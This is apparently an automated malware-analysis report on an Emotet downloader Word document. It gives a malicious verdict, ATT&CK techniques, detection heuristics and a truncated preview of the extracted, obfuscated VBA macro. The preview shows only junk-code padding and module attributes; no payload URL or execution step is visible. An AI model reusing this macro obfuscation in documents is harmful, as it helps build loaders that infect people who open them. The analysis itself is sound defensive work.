Verdict: MALICIOUS (Risk Score: 282)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing obfuscated VBA macros, specifically an AutoOpen macro. Heuristics indicate an obfuscated loader that uses GetObject and execution functions, consistent with Emotet's behavior. ClamAV detection further confirms this, identifying it as Doc.Downloader.Emotet-7330271-0. The VBA script's primary function appears to be downloading and executing a second-stage payload.
Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-7330271-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7330271-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 83011 bytes |

SHA-256: 2f70eea2a10baadbb674cc745b438e15ce1e37f0dd451152dc649212678bcefe

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "c5x464380577"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "b100791850x, 0, 0, MSForms, TextBox"
Attribute VB_Control = "x0b05200c00, 1, 1, MSForms, TextBox"
Attribute VB_Control = "c03505c991c1, 2, 2, MSForms, TextBox"
Attribute VB_Control = "b10431b7250, 3, 3, MSForms, TextBox"
Attribute VB_Control = "c37021c0x1764, 4, 4, MSForms, TextBox"
Attribute VB_Control = "b7x09783522, 5, 5, MSForms, TextBox"
Attribute VB_Name = "bc9850999c4"
Function b1c42c65025()
On Error Resume Next
'Central320 DuBuque Valley, Kayleighhaven, Anguilla National60941 Grant Harbor, West Vestahaven, Madagascar
x2809x0c0c2 = Rnd(x10b0060001c7 * ChrB(504)) + Log(876)
'Legacy7581 Boyer Branch, South Evanburgh, Macedonia National691 Nat Bypass, Murrayport, Holy See (Vatican City State)
b64044bc3b1 = Rnd(bccx59100070 * ChrB(691)) + Log(575)
'Dynamic321 Koepp Spring, Wardborough, Montserrat Investor79775 Brock Road, Buckridgeport, British Indian Ocean Territory (Chagos Archipelago)
x440bc07302 = Rnd(cb5x81169819 * ChrB(756)) + Log(519)
'Regional84310 Julius Haven, Vivienberg, Ecuador Customer896 Howard Rest, Ryanview, Tunisia
x070c3c0902c6 = Rnd(c490c10300808 * ChrB(850)) + Log(426)
'Dynamic88647 Duane Estate, Lake Irma, Saint Lucia Direct16290 Pacocha Mills, South Elmira, Montserrat
xb150000cc3c3 = Rnd(b808026005157 * ChrB(548)) + Log(179)
'Global162 Schoen Branch, Jacobibury, Togo Regional857 Frami Cliff, Lake Guadalupemouth, New Zealand
b620910b7xx5 = Rnd(cb5015xxx8582 * ChrB(513)) + Log(951)
'International09048 Green Oval, Nathanaeltown, Jamaica Internal30314 Daniella Glen, North Nick, Portugal
b4cb9700405 = Rnd(x800x0049834 * ChrB(254)) + Log(199)
'Senior00187 George Greens, Lake Jamison, Switzerland Investor523 Ulises Club, West Dusty, Suriname
'Customer32336 Cecelia Haven, Lake Susannaville, Finland District1708 Langworth Passage, Kyleberg, Ukraine
b85x05x08040 = Rnd(xb09050398825 * ChrB(846)) + Log(952)
'Lead77351 Jerel Harbor, Damionshire, Bulgaria Chief57639 Zelda Tunnel, Fatimashire, Guinea
c081x31006b61 = Rnd(b10x18985x9 * ChrB(122)) + Log(93)
'International15485 Ezekiel Pine, Joannytown, Kyrgyz Republic Chief42204 Blick Plaza, West Silas, Madagascar
c48x4b0b96170 = Rnd(x0073824654 * ChrB(874)) + Log(76)
'Dynamic576 Shields Landing, Reinholdfurt, Saint Vincent and the Grenadines Central46479 Nicola Drive, Declanport, San Marino
xc1212b30bc = Rnd(c986524648b * ChrB(926)) + Log(726)
'Regional10852 O'Conner Tunnel, West Laceymouth, Armenia Future451 Sanford Square, Port Darrel, Niue
x60c6x0006304 = Rnd(c3905287000 * ChrB(170)) + Log(411)
'Human7209 Rutherford Islands, Gutmannbury, Hungary Central76757 Adrien Trace, Moorebury, Somalia
b06bc4x6396b1 = Rnd(x38b728x038 * ChrB(695)) + Log(696)
'Global361 Kihn Walks, Dakotafort, Sri Lanka Corporate990 Gracie Keys, Port Furman, Uganda
c1170x3cx100 = Rnd(b8181x745307 * ChrB(399)) + Log(486)
'Dynamic33589 Ona Shore, Port Hayley, Bouvet Island (Bouvetoya) Chief4772 Batz Tunnel, Cristianview, Switzerland
'Central85884 Larson Skyway, South Ludwig, China Human0013 Stiedemann Brook, Lake Merrittberg, Virgin Islands, U.S.
x9c263073b1 = Rnd(c8x05004287 * ChrB(512)) + Log(587)
'Corporate874 Bernier Creek, Crystalborough, Bulgaria Customer8112 Roman Parks, Rosamondbury, Nigeria
c80cb83803914 = Rnd(x06620b501x0 * ChrB(696)) + Log(547)
'Chief9695 Cindy Highway, Marvintown, Albania National47768 Pacocha Views, West Ritatown, Gabon
cb798818c07c = Rnd(x37x95c5bx2 * ChrB(700)) + Log(665)
'Product960 Travon Mountains, East Thelmabury, Venezuela Central9914 Schuppe Course, East Janicehaven, Cambodia
xb0b96xx2b50 = Rnd(b870c20c570 * ChrB(116)) + Log(955)
'Lead28507 Morissette Glen, New Lesliefurt, Pitcairn Islands Customer409 Lilian Plaza, West Jillian, Cuba
b20657x0610 = Rnd(bxx1b22c706b * ChrB(733)) +
... (truncated)
```